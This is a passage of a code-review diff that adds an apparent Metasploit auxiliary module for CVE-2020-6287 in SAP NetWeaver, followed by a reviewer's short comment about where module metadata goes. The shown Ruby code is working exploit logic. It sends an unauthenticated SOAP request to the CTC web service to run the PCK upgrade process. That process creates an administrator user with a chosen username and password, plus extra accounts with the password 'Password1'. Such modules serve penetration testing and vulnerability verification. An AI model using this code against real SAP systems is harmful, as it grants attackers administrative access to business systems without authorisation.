modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb

```diff
@@ -0,0 +1,248 @@
+      print_error("  #{message.text}")
+    end
+  end
+
+  def send_request_soap(envelope)
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path),
+        'method' => 'POST',
+        'ctype' => 'text/xml;charset=UTF-8',
+        'data' => envelope
+      }
+    )
+
+    return nil unless res&.code == 200
+    return nil unless res.headers['Content-Type'].strip.start_with?('text/xml')
+
+    res
+  end
+
+  def invoke_pckupgrade
+    message = { name: 'Netweaver.PI_PCK.PCK' }
+    message[:data] = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <PCK>
+        <Usermanagement>
+          <SAP_XI_PCK_CONFIG>
+            <roleName>#{datastore['ROLE'].encode(xml: :text)}</roleName>
+          </SAP_XI_PCK_CONFIG>
+          <SAP_XI_PCK_COMMUNICATION>
+            <roleName>Administrator</roleName>
+          </SAP_XI_PCK_COMMUNICATION>
+          <SAP_XI_PCK_MONITOR>
+            <roleName>Administrator</roleName>
+          </SAP_XI_PCK_MONITOR>
+          <SAP_XI_PCK_ADMIN>
+            <roleName>Administrator</roleName>
+          </SAP_XI_PCK_ADMIN>
+          <PCKUser>
+            <userName>#{datastore['USERNAME'].encode(xml: :text)}</userName>
+            <password secure="true">#{datastore['PASSWORD'].encode(xml: :text)}</password>
+          </PCKUser>
+          <PCKReceiver>
+            <userName>pckreceiver2</userName>
+            <password secure="true">Password1</password>
+          </PCKReceiver>
+          <PCKMonitor>
+            <userName>pckmonitor2</userName>
+            <password secure="true">Password1</password>
+          </PCKMonitor>
+          <PCKAdmin>
+            <userName>pckadmin2</userName>
+            <password secure="true">Password1</password>
+          </PCKAdmin>
+        </Usermanagement>
+      </PCK>
+    ENVELOPE
+
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+        <soapenv:Header/>
+        <soapenv:Body>
+          <urn:execute>
+              <identifier>
+                <component>sap.com/tc~lm~config~content</component>
+                <path>content/Netweaver/PI_PCK/PCK/PCKProcess.cproc</path>
+             </identifier>
+             <contextMessages>
+                <baData>#{Rex::Text.encode_base64(message[:data])}</baData>
+                <name>#{message[:name]}</name>
+             </contextMessages>
+          </urn:execute>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    ENVELOPE
+
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to start the PCK Upgrade process') unless res&.code == 200
+
+    session_id = res.get_xml_document.xpath('//return/text()').to_s
+    WebServiceJob.new(self, session_id)
+  end
+end
+
+class WebServiceJob
```

Comment:
Haha, thanks for moving this. I was afraid to ask, since some people prefer it at the top. I prefer the metadata at the top.